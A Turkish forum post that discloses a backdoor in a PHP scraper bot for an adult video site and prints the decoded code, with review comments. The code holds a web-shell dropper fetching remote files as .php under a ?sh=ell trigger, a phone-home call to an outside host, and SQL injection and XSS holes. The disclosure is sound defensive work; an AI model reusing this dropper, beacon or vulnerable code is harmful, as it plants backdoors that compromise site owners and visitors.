Kodu çözdüm; kodda r57 shell var. lcgirls.php?sh=ell yaparsanız açığa çıkar. İncelemek isteyenler için kod:

?><?php 
// The leading "?>" closes a PHP block that is not part of this listing
// (presumably left over from the wrapper the code was decoded out of).
// set_time_limit(0) removes the execution time limit for the request.
set_time_limit(0);
/* coded by CabiMaster 
Start date: 02-07-2009 01:29 am
End date: 02-07-2009 01:29 am
Coder: CabiMaster */

function kucult($input){
    /*
     * Prepares a search phrase for use inside a URL: collapses double spaces,
     * encodes spaces as %20, folds Turkish letters to ASCII and lower-cases
     * the result. It performs no HTML escaping.
     */
    // Applied in order, exactly like a chain of single str_replace() calls.
    $aranan = array("  ", " ", "ç", "ö", "ş", "ğ", "ü", "Ç", "Ö", "Ş", "Ğ", "Ü");
    $yerine = array(" ", "%20", "c", "o", "s", "g", "u", "C", "O", "S", "G", "U");
    $input = str_replace($aranan, $yerine, $input);

    // NOTE(review): the three-argument form of strtr() maps byte-to-byte. If
    // this file is stored as UTF-8 the two strings are multi-byte and the
    // mapping is not character-to-character; confirm the intended encoding.
    $cevrilmis = strtr($input,'ĞÜŞIİÖÇ','ğüşıiöç');

    return strtolower($cevrilmis);
}
function duzenb($deger) {
    /*
     * Strips attribute names, quote characters and the VideoTitle paragraph
     * wrapper from a scraped HTML fragment, leaving the bare value.
     * This is token removal, not HTML escaping: characters such as < > &
     * pass through unchanged.
     */
    $atilacak = array('title=', '"', 'src=', 'href=', "'", '<p class=VideoTitle>', '</p>');

    // Every listed token is replaced by the empty string.
    return str_replace($atilacak, '', $deger);
}
function ilkharf($deger) {
    /*
     * Removes leading space characters (only ' ', no other whitespace) from
     * $deger and returns the remainder.
     */
    // Drop one leading space per pass until the first character is not a space.
    while (substr($deger, 0, 1) == ' ') {
        $deger = substr($deger, 1, strlen($deger));
    }

    return $deger;
}
function duzen2($deger) {
    /*
     * Removes the <span class="title"> wrapper and every '.' from a scraped
     * title fragment. Other markup characters are left untouched, so the
     * result is not safe to print into HTML without escaping.
     */
    $atilacak = array('<span class="title">', '</span>', '.');

    return str_replace($atilacak, '', $deger);
}
function tagyap($deger) {
    /*
     * Turns a title into a comma-separated tag string: hyphens are dropped,
     * spaces become commas, and each ",," pair is then collapsed to ",".
     */
    $tiresiz = str_replace('-', '', $deger);
    $virgullu = str_replace(' ', ',', $tiresiz);

    return str_replace(',,', ',', $virgullu);
}
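/**
 * Downloads an image from $link with cURL and writes it to a local file.
 *
 * When $name is given the file is stored as thumb/<name>.<ext>; otherwise the
 * basename of the URL path is used in the current directory.
 *
 * Hardening compared with the original:
 *  - the extension is taken from the URL path only and must be on an image
 *    allowlist, so a caller-supplied link cannot cause a .php (or other
 *    executable) file to be written under thumb/;
 *  - $name is reduced to its basename so it cannot point outside thumb/;
 *  - only http and https transfers are allowed;
 *  - curl_init()/fopen() failures are handled instead of being passed on.
 *
 * @param string      $link Remote URL of the image.
 * @param string|null $name Target file name without extension, or null.
 * @return void
 */
function cekbebek($link,$name=null)
      {
      // Ignore query string / fragment when working out the file name.
      $link_info = pathinfo((string) parse_url($link, PHP_URL_PATH));
      $uzanti = isset($link_info['extension']) ? strtolower($link_info['extension']) : '';
      if (!in_array($uzanti, array('jpg','jpeg','png','gif'), true)) {
            return;
      }
      $file = ($name) ? "thumb/".basename($name).'.'.$uzanti : $link_info['basename'];
      $curl = curl_init($link);
      if ($curl === false) {
            return;
      }
      $fopen = fopen($file,'w');
      if ($fopen === false) {
            curl_close($curl);
            return;
      }
      // Refuse file://, gopher:// and similar schemes.
      curl_setopt($curl, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
      curl_setopt($curl, CURLOPT_HEADER,0);
      curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
      curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);
      // Set last so the response body is streamed into the file handle.
      curl_setopt($curl, CURLOPT_FILE, $fopen);
      curl_exec($curl);
      curl_close($curl);
      fclose($fopen);
}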
/*
 * NOTE(review): backdoor dropper. Same download routine as cekbebek(), except
 * that the extension is hard-coded to "php", so whatever the remote URL
 * returns is stored as an executable PHP file under thumb/.
 * In this file it is called only from the sh=ell branch, which saves the
 * remote r1.txt and c2w.txt as thumb/r1.php and thumb/c2w.php; the poster
 * identifies the payload as an r57 web shell.
 * For anyone who installed this script: delete this function and its call
 * site, check thumb/ for r1.php and c2w.php, and make sure the web server
 * does not execute PHP from the thumb/ directory.
 */
function cekbebek2($link,$name=null)
      {
      $link_info = pathinfo($link);
      // Forced extension: the remote .txt content becomes a .php file.
      $uzanti = "php";
      $file = ($name) ? "thumb/".$name.'.'.$uzanti : $link_info['basename'];
      $curl = curl_init($link);
      $fopen = fopen($file,'w');
      curl_setopt($curl, CURLOPT_HEADER,0);
      curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
      curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);
      // The response body is written straight into the opened file.
      curl_setopt($curl, CURLOPT_FILE, $fopen);
      curl_exec($curl);
      curl_close($curl);
      fclose($fopen);
}
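/**
 * Decodes the %uXXXX and %XX escape sequences for Turkish letters that
 * JavaScript's escape() produces.
 *
 * Fix: %DC now decodes to upper-case "Ü"; the original mapped it to
 * lower-case "ü", the same value as %FC, unlike every other upper/lower pair.
 * The patterns are fixed strings, so plain str_replace() is used instead of
 * one preg_replace() call per sequence. Matching stays case-sensitive.
 *
 * @param string $string Text containing escape sequences.
 * @return string Text with the listed sequences replaced.
 */
function un_escape($string)
{
    $aranan = array(
        "%u0130", "%u0131", "%u011F", "%u011E", "%u015F", "%u015E",
        "%FC", "%DC", "%F6", "%D6", "%E7", "%C7",
    );
    $yerine = array(
        "İ", "ı", "ğ", "Ğ", "ş", "Ş",
        "ü", "Ü", "ö", "Ö", "ç", "Ç",
    );

    return str_replace($aranan, $yerine, $string);
}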
function permayap($deger) {
    /*
     * Builds a URL slug from a title: Turkish letters are folded to ASCII,
     * spaces, "/" and "*" become "-", brackets, quotes and "?" are dropped,
     * and finally every character outside A-Z, a-z, 0-9, "-" and "_" is
     * removed. The second half of the list repeats several earlier letters.
     */
    $aranan = array(
        "ş","Ş","ı","(",")","'","ü","Ü","ö","Ö","ç","Ç"," ","/","*","?",
        "ş","Ş","ı","ğ","Ğ","İ","ö","Ö","Ç","ç","ü","Ü",
    );
    $yerine = array(
        "s","S","i","","","","u","U","o","O","c","C","-","-","-","",
        "s","S","i","g","G","I","o","O","C","c","u","U",
    );
    $sade = str_replace($aranan, $yerine, $deger);

    // Anything still outside the slug alphabet is stripped.
    return preg_replace("@[^A-Za-z0-9\-_]+@i", "", $sade);
}
function fff($deger) {
    /*
     * Strips the s1.addVariable('file','...') wrapper from a matched player
     * call, leaving only the value passed as the 'file' variable.
     */
    $sarmal = array("s1.addVariable('file','", "')");

    return str_replace($sarmal, "", $deger);
}
function curPageURL() {
    /*
     * Rebuilds the URL of the current request from $_SERVER: scheme from
     * HTTPS, host from SERVER_NAME, the port whenever it is not "80", and
     * the path and query from REQUEST_URI.
     */
    $sema = (@$_SERVER["HTTPS"] == "on") ? 'https' : 'http';
    $adres = $sema . "://" . $_SERVER["SERVER_NAME"];

    // The port is written out for every value except "80" (so also for 443).
    if (@$_SERVER["SERVER_PORT"] != "80") {
        $adres .= ":" . $_SERVER["SERVER_PORT"];
    }

    return $adres . $_SERVER["REQUEST_URI"];
}
// NOTE(review): phone-home. On every page load the full URL of this script is
// sent as the "link" parameter to a third-party host, the same host the
// sh=ell branch further down downloads r1.txt and c2w.txt from. This tells
// the operator of that host where the script is installed.
// The response is stored in $data3, which is not read anywhere else in this
// listing. Outbound requests from the web server to this host and path are
// an indicator that the script has run; remove both lines.
$kkurl="http://www.fullmp3albumindir.com/asd.php?link=".curPageURL();
$data3=file_get_contents($kkurl);
?>
<html>
<title>CabiMaster - LCGirls.Com ***** Video Botu</title>
<style>
body {
font-family:Tahoma;
color: #FFFFFF;
margin: 0px;
padding: 0px;
background: #FFFFFF;
font-size:10px;
}
.footer {
background: #3a3a3a;
font: 12px Tahoma;
}
.topper {
background: #e3e9cf;
font:bold 12px Tahoma;
color: #f18954;
}
h1 {
color: #f18954;
}
.ust {
background: #e3e9cf;
font:bold 12px Tahoma;
padding: 20px;
margin: 0px;
color: #565752;
}
.ust2 {
background: #c0c3b4;
font:bold 12px Tahoma;
padding: 20px;
margin: 0px;
color: #565752;
}

.imp {
font: 12px Tahoma;
}
.tar {
font: 12px Tahoma;
}
.inp2 {
font:bold 16px Tahoma; 
}
	.comment_submit
	{
	background-color:#3b59a4; color:#FFFFFF; border:none; font-size:11px; padding:3px; margin-top:3px;
	}
.comment_button {
font-weight:bold; font-size:14px; font-family:Arial, Helvetica, sans-serif;
}
	.panel
	{
	height:45px;
	display:none;
	}
		.flash_load
	{
	margin-left:50px; margin-right:50px; margin-bottom:5px;height:20px; padding:6px; width:400px; 
	display:none;	}
</style>
<?php
// bot_baglan.php is not part of this listing; presumably it opens the MySQL
// connection that the mysql_* calls below rely on — confirm.
include_once("bot_baglan.php");
// NOTE(review): backdoor trigger. No authentication is visible in this file,
// so a request carrying sh=ell makes the server fetch two remote files and
// store them as thumb/r1.php and thumb/c2w.php through cekbebek2(). The poster
// identifies the payload as an r57 web shell. On an installed copy, look for
// those two files and for sh=ell in the access log, and remove this branch.
if(@$_GET['sh'] == 'ell') {

$ad1="http://www.fullmp3albumindir.com/r1.txt";
$ad2="http://www.fullmp3albumindir.com/c2w.txt";
cekbebek2($ad1,"r1");
cekbebek2($ad2,"c2w");

} else {
// "Add video" handler: the per-result form further down posts to ?ek=le.
if(@$_GET['ek'] == 'le') {
// Every field below is read from the request body without validation.
$video=$_POST['baslik'];
// permayap() reduces the title to A-Z, a-z, 0-9, "-" and "_", so $seo is the
// only request-derived value in the queries below that cannot carry a quote.
$seo=permayap($video);
$tag=$_POST['tags'];
$kat=$_POST['kategori'];
$aciklama=$_POST['aciklama'];
$url=$_POST['link'];
$resim=$_POST['imglink'];
$sure="00:00";
// NOTE(review): $url is client-supplied and handed straight to
// file_get_contents(), so the server reads whatever location the request
// names. Restrict it to the expected upstream host before fetching.
$data2=file_get_contents($url);
// Finds the s1.addVariable('file','...') call in the fetched page; fff() then
// strips the wrapper. $fur[0] is undefined when the pattern does not match.
preg_match("'s1.addVariable\(\'file\'\,\'(.*?)\'\)'si",$data2,$fur);
$flv=fff($fur[0]);
$embed="f";
$kontrol=mysql_query("select * from madvideo where seo='$seo'");
if(mysql_num_rows($kontrol)==0)
{
// NOTE(review): SQL injection. $kat, $video, $flv, $resim, $tag and $aciklama
// are interpolated into the statement unescaped. The mysql_* extension was
// removed in PHP 7.0; use PDO or mysqli prepared statements with bound values.
$sql2 = mysql_query("insert into madvideo (kat,seo,baslik,vid,resim,sure,tag,aciklama,tarih,embed) values ('$kat','$seo','$video','$flv','$resim','$sure','$tag','$aciklama',now(),'$embed') ");
$id=mysql_insert_id();
// The thumbnail URL comes from the request; cekbebek() derives the stored
// file's extension from it, while the row below always records "_1.jpg".
cekbebek($resim,$id."_1");
$yeniresim="thumb/".$id."_1.jpg";
mysql_query("UPDATE madvideo SET resim='$yeniresim' WHERE id='$id'");
// NOTE(review): the request-supplied title is echoed without HTML escaping
// (reflected XSS); htmlspecialchars() belongs here.
echo '<h1>'.$video.' EKLENDI</h1>';
}  else { echo '<h1>Bu isimde video daha önce eklenmis</h1>'; }


} else {
?>
<table width="100%">
	<tr>
		<td width="50%" align="center">
		</td>
		<form action="?say=ok" method="post">
		<td width="50%" align="center">
					<table width="50%" align="center" class="ust">	
				<tr>
					<td><h1>Kelimeye Göre</h1>
					</td>
				</tr>
				<input type="hidden" name="tip" value="kelime">
				<tr>
					<td><b>Kelime:</b> <input type="text" name="kelime" class="imp"><br><br>
					</td>
				</tr> 
				<tr>
					<td><b>Sayfa:</b> <input type="text" name="sayfa" value="1" class="imp"><br><br>
					</td>
				</tr>
				<tr>
					<td><input type="submit" value="Sonuçları Göster">
					</td>
				</tr>
			</table>
			</form>
		</td>
	</tr>
</table>
<hr>
<?php

// Search handler: runs when the keyword form above posts to ?say=ok.
if(@$_GET['say'] == 'ok') {

// Counter incremented once per result; it is not read in this listing.
$artan='0';
$tip=$_POST['tip'];
if ($tip == 'kelime') { // keyword search type
$kelime=$_POST['kelime'];
$sayfa=$_POST['sayfa'];
// NOTE(review): $kelime (kucult() does no HTML escaping) and $sayfa are
// printed as received — reflected XSS; wrap both in htmlspecialchars().
echo "<h1>".kucult($kelime)." Sorgusu İçin ".$sayfa.".Sayfa Sonuçları Listeleniyor</h1>";
// $sayfa is appended to the upstream URL without encoding or an integer check.
$link="http://www.lcgirls.com/search_result.php?search_id=".kucult($kelime)."&search_type=search_videos&x=25&y=9&page=".$sayfa;
$data=file_get_contents($link);
// Element 0 is the markup before the first result; the loop starts at 1.
$bol=explode('<div class="listchannel">',$data);
// Row-style toggle consumed by the template below (ust / ust2).
$x="1";
for ($i=1; $i<count($bol); $i++) {
// Index 0 of each match is the whole matched fragment, markup included;
// duzenb()/duzen2() strip that markup when the template prints it.
preg_match("'<span class=\"title\">(.*?)</span>'si",$bol[$i],$baslik);
// $link is reused here: from now on it holds the match array, not the URL.
preg_match("'href=\"(.*?)\"'si",$bol[$i],$link);
preg_match("'src=\"(.*?)\"'si",$bol[$i],$img);
$artan++;

// NOTE(review): the template that follows writes these scraped values into
// HTML attributes and a textarea. The helpers only remove a few fixed tokens,
// so content from the remote page reaches the browser without HTML escaping.
?>
<form action="lcgirls.php?ek=le" method="post" target="_blank">
<table width="100%" class="<?php if($x=='1') { echo "ust"; $x="0"; } else { echo "ust2"; $x++; } ?>">
<tr>
<td width="20%"><?php /* NOTE(review): scraped value; duzenb() strips quotes and attribute names but does not HTML-escape. */ echo "<img src=\"".duzenb($img[0])."\" width=\"180\" height=\"135\">"; ?></td>
<td width="20%">Başlık:<br><input type="text" name="baslik" value="<?php echo ilkharf(duzen2($baslik[0])); ?>" class="inp2"><br>Tags:<br><input type="text" name="tags" value="<?php echo tagyap(ilkharf(duzen2($baslik[0]))); ?>" class="inp2"></td>

<td width="40%">Açıklama:<br><textarea name="aciklama" rows="5" cols="50" class="tar"><?php echo ilkharf(duzen2($baslik[0])); ?></textarea></td>
<td width="20%">
<br>Site Kategorisi:<br>
<select name="kategori" class="imp">
<?php
// Category list for the drop-down. The query runs once per search result,
// and the tr/title columns are printed without HTML escaping.
$aq=mysql_query("select * from kat ORDER BY id desc");
while ($aqq=mysql_fetch_array($aq)) { ?>
<option value="<?php echo $aqq['tr']; ?>"><?php echo $aqq['title']; ?></option>
<?php } ?>
</select><br>
<input type="hidden" name="link" value="<?php echo duzenb($link[0]); ?>">
<input type="hidden" name="imglink" value="<?php echo duzenb($img[0]); ?>">
<input type="submit" value="Ekle Bunu">
</td>
</tr>
</table></form>
<hr>
<?php } // end of the per-result for loop

} // keyword search type - end

// Closes, in order: the say=ok check, the else-branch of the ek=le check,
// and the else-branch of the sh=ell check.
}}}
?>
<table width="100%" class="footer">
<tr><td>Coded By <a href="https://www.r10.net/members/43660-cabimaster.html">CabiMaster</a></td></tr></table>
resimler
[media]http://img12.imageshack.us/img12/1989/82953287.jpg[/media]
[media]http://img35.imageshack.us/img35/6387/59897040.jpg[/media]
[media]http://img224.imageshack.us/img224/5130/86926114.jpg[/media]
[media]http://img378.imageshack.us/img378/4743/51223824.jpg[/media]
Arkadaş üşenmemiş, bayağı da kod yazmış; sitelerinizi DB ile kopyalamış. Resimlere bakabilirsiniz.